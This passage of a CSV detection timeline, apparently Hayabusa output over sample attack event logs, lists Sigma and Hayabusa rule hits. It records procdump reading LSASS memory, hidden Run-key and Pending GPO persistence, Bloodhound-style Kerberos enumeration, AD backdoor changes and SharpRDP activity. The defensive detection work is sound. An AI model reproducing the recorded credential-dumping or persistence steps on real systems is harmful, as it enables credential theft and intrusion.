Explorer.exe,,rules/sigma/process_creation/proc_creation_win_susp_explorer.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec_root_cmdline_@rimpq_@CyberRaiju.evtx +2020-07-03 18:05:58.278 +09:00,win10.ecorp.com,1,medium,Evas,Explorer Root Flag Process Tree Break,,rules/sigma/process_creation/proc_creation_win_susp_explorer_break_proctree.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec_root_cmdline_@rimpq_@CyberRaiju.evtx +2020-07-03 18:05:58.367 +09:00,win10.ecorp.com,1,info,,Process Created,"Cmd: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding | Process: C:\Windows\explorer.exe | User: ECORP\Administrator | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch -p | LID: 0xf3072 | PID: 3612 | PGUID: 
6661D424-F4F6-5EFE-0000-0010A2F6F800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec_root_cmdline_@rimpq_@CyberRaiju.evtx +2020-07-03 18:05:58.583 +09:00,win10.ecorp.com,1,info,,Process Created,"Cmd: ""C:\Windows\System32\calc.exe"" | Process: C:\Windows\System32\calc.exe | User: ECORP\Administrator | Parent Cmd: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding | LID: 0xf3072 | PID: 3224 | PGUID: 6661D424-F4F6-5EFE-0000-0010C00AF900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec_root_cmdline_@rimpq_@CyberRaiju.evtx +2020-07-03 18:05:58.739 +09:00,win10.ecorp.com,1,info,,Process Created,"Cmd: ""C:\Windows\System32\win32calc.exe"" | Process: C:\Windows\System32\win32calc.exe | User: ECORP\Administrator | Parent Cmd: ""C:\Windows\System32\calc.exe"" | LID: 0xf3072 | PID: 2632 | PGUID: 6661D424-F4F6-5EFE-0000-00101D25F900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec_root_cmdline_@rimpq_@CyberRaiju.evtx +2020-07-04 23:18:58.268 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,"Persistence - Hidden Run value detected | SetValue: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\: ""c:\windows\tasks\taskhost.exe"" | Process: C:\Users\Public\tools\evasion\a.exe | PID: 3728 | PGUID: 747F3D96-8FD2-5F00-0000-0010C15D2200",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/evasion_persis_hidden_run_keyvalue_sysmon_13.evtx +2020-07-04 23:18:58.268 +09:00,MSEDGEWIN10,13,medium,Persis,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/evasion_persis_hidden_run_keyvalue_sysmon_13.evtx +2020-07-04 
23:31:26.838 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - Pending GPO | SetValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000\Software\Microsoft\IEAK\GroupPolicy\PendingGPOs\Count: DWORD (0x00000001) | Process: C:\Windows\regedit.exe | PID: 1452 | PGUID: 747F3D96-92BB-5F00-0000-0010C1A73100,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_pendingGPO_sysmon_13.evtx +2020-07-04 23:31:26.849 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - Pending GPO | SetValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000\Software\Microsoft\IEAK\GroupPolicy\PendingGPOs\Section1: DefaultInstall | Process: C:\Windows\regedit.exe | PID: 1452 | PGUID: 747F3D96-92BB-5F00-0000-0010C1A73100,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_pendingGPO_sysmon_13.evtx +2020-07-04 23:31:26.856 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - Pending GPO | SetValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000\Software\Microsoft\IEAK\GroupPolicy\PendingGPOs\Path1: c:\programdata\gpo.inf | Process: C:\Windows\regedit.exe | PID: 1452 | PGUID: 747F3D96-92BB-5F00-0000-0010C1A73100,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_pendingGPO_sysmon_13.evtx +2020-07-08 06:51:39.204 +09:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: C:\Users\Public\tools\SysinternalsSuite\procdump.exe | Tgt Process: C:\windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 30256 | Src PGUID: 00247C92-EE6B-5F04-0000-00108C67A859 | Tgt PID: 908 | Tgt PGUID: 
00247C92-DC62-5EEF-0000-001026F60100,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_2x10_lsass_with_different_pid_RtlCreateProcessReflection.evtx +2020-07-08 06:51:39.204 +09:00,LAPTOP-JU4M3I0E,10,high,CredAccess,LSASS Memory Access by Tool Named Dump,,rules/sigma/process_access/sysmon_lsass_memdump_indicators.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_2x10_lsass_with_different_pid_RtlCreateProcessReflection.evtx +2020-07-08 06:51:39.204 +09:00,LAPTOP-JU4M3I0E,10,high,CredAccess,LSASS Access from Program in Suspicious Folder,,rules/sigma/process_access/win_susp_proc_access_lsass_susp_source.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_2x10_lsass_with_different_pid_RtlCreateProcessReflection.evtx +2020-07-08 06:51:39.256 +09:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: C:\Users\Public\tools\SysinternalsSuite\procdump64.exe | Tgt Process: C:\windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 28528 | Src PGUID: 00247C92-EE6B-5F04-0000-00109069A859 | Tgt PID: 908 | Tgt PGUID: 00247C92-DC62-5EEF-0000-001026F60100,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_2x10_lsass_with_different_pid_RtlCreateProcessReflection.evtx +2020-07-08 06:51:39.256 +09:00,LAPTOP-JU4M3I0E,10,high,CredAccess,LSASS Memory Access by Tool Named Dump,,rules/sigma/process_access/sysmon_lsass_memdump_indicators.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_2x10_lsass_with_different_pid_RtlCreateProcessReflection.evtx +2020-07-08 06:51:39.256 +09:00,LAPTOP-JU4M3I0E,10,high,CredAccess,LSASS Access from Program in Suspicious Folder,,rules/sigma/process_access/win_susp_proc_access_lsass_susp_source.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential 
Access/sysmon_2x10_lsass_with_different_pid_RtlCreateProcessReflection.evtx +2020-07-08 06:51:39.262 +09:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: C:\Users\Public\tools\SysinternalsSuite\procdump64.exe | Tgt Process: C:\windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 28528 | Src PGUID: 00247C92-EE6B-5F04-0000-00109069A859 | Tgt PID: 30096 | Tgt PGUID: 00247C92-EE6B-5F04-0000-00105C6CA859,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_2x10_lsass_with_different_pid_RtlCreateProcessReflection.evtx +2020-07-08 06:51:39.262 +09:00,LAPTOP-JU4M3I0E,10,high,CredAccess,LSASS Memory Access by Tool Named Dump,,rules/sigma/process_access/sysmon_lsass_memdump_indicators.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_2x10_lsass_with_different_pid_RtlCreateProcessReflection.evtx +2020-07-08 06:51:39.262 +09:00,LAPTOP-JU4M3I0E,10,high,CredAccess,LSASS Access from Program in Suspicious Folder,,rules/sigma/process_access/win_susp_proc_access_lsass_susp_source.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_2x10_lsass_with_different_pid_RtlCreateProcessReflection.evtx +2020-07-10 05:41:04.488 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: ATACORE01$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-10 05:41:04.490 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: PKI01$ | IP Addr: ::ffff:10.23.23.9 | Status: 
0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-10 05:41:04.496 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: EXCHANGE01$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-10 05:41:04.497 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: WEC01$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-10 05:41:04.501 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: FS02$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-10 05:41:04.505 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: WSUS01$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-10 05:41:04.534 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: DHCP01$ | IP Addr: 
::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-10 05:41:04.576 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: ATANIDS01$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-10 05:41:04.861 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: PRTG-MON$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-10 05:41:04.862 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: MSSQL01$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-10 05:41:04.863 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: FS01$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-10 05:41:04.864 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: 
ADFS01$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-10 05:41:04.865 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: WEBIIS01$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-10 05:41:04.885 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: ROOTDC1$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-10 05:41:04.887 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: FS03VULN$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-10 05:41:04.887 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: krbtgt | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-10 05:41:04.912 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: 
admmig@OFFSEC.LAN | Svc: ROOTDC2$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-10 05:41:04.939 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: krbtgt | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-10 05:41:04.949 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: krbtgt | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-10 05:41:04.950 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: krbtgt | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-10 05:41:04.951 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: krbtgt | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-10 05:41:05.016 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket 
Requested,User: admmig@OFFSEC.LAN | Svc: ROOTDC2$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-10 05:41:58.983 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: ROOTDC1$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-10 05:41:59.810 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: ROOTDC1$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-10 05:57:38.917 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x64f5bad,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx +2020-07-10 05:57:40.334 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: lambda-user | Computer: - | IP Addr: 10.23.23.9 | LID: 0x64f5bf1,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx +2020-07-10 05:57:40.365 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: lambda-user | Computer: - | IP Addr: 10.23.23.9 | LID: 
0x64f5c04,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx +2020-07-10 05:57:40.430 +09:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx +2020-07-10 05:57:40.430 +09:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx +2020-07-10 05:57:40.714 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: lambda-user | Computer: - | IP Addr: 10.23.23.9 | LID: 0x64f5c7f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx +2020-07-10 05:57:40.723 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: lambda-user | Computer: - | IP Addr: 10.23.23.9 | LID: 0x64f5cb1,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx +2020-07-10 05:57:40.725 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: lambda-user | Computer: - | IP Addr: 10.23.23.9 | LID: 0x64f5cc8,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx +2020-07-10 05:57:40.728 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: lambda-user | Computer: - | IP 
Addr: 10.23.23.9 | LID: 0x64f5cf4,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx +2020-07-10 05:57:40.825 +09:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx +2020-07-10 05:57:52.909 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: ATACORE01$ | Computer: - | IP Addr: 10.23.42.30 | LID: 0x64f5ef5,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx +2020-07-10 05:58:11.977 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x64f6471,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx +2020-07-10 05:58:11.981 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: ROOTDC1$ | Computer: - | IP Addr: fe80::1cae:5aa4:9d8d:106a | LID: 0x64f64a3,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx +2020-07-10 05:58:12.004 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x64f64ca,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx +2020-07-10 
05:58:12.005 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x64f64e1,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx +2020-07-10 05:58:12.005 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x64f64f3,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx +2020-07-10 06:22:31.163 +09:00,rootdc1.offsec.lan,5136,high,Persis,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4738,5136-SPN set on user account.evtx" +2020-07-10 06:25:41.773 +09:00,rootdc1.offsec.lan,5136,high,Persis,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4738,5136-SPN set on user account.evtx" +2020-07-10 07:00:11.181 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 192.168.56.1:52543 (LAPTOP-JU4M3I0E) | Dst: 192.168.56.101:3389 (MSEDGEWIN10) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 428 | PGUID: 747F3D96-85F1-5F07-0000-001074CB0000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:00:17.584 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\windows\system32\notepad.exe"" | Process: C:\Windows\System32\notepad.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x68b4a | PID: 2568 | 
PGUID: 747F3D96-9371-5F07-0000-00102D024400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:00:27.033 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 192.168.56.1:52545 (LAPTOP-JU4M3I0E) | Dst: 192.168.56.101:3389 (MSEDGEWIN10) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 428 | PGUID: 747F3D96-85F1-5F07-0000-001074CB0000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:00:31.217 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\windows\system32\notepad.exe"" | Process: C:\Windows\System32\notepad.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x68b4a | PID: 7356 | PGUID: 747F3D96-937F-5F07-0000-0010EBDD4400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:00:40.413 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 192.168.56.1:52546 (LAPTOP-JU4M3I0E) | Dst: 192.168.56.101:3389 (MSEDGEWIN10) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 428 | PGUID: 747F3D96-85F1-5F07-0000-001074CB0000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 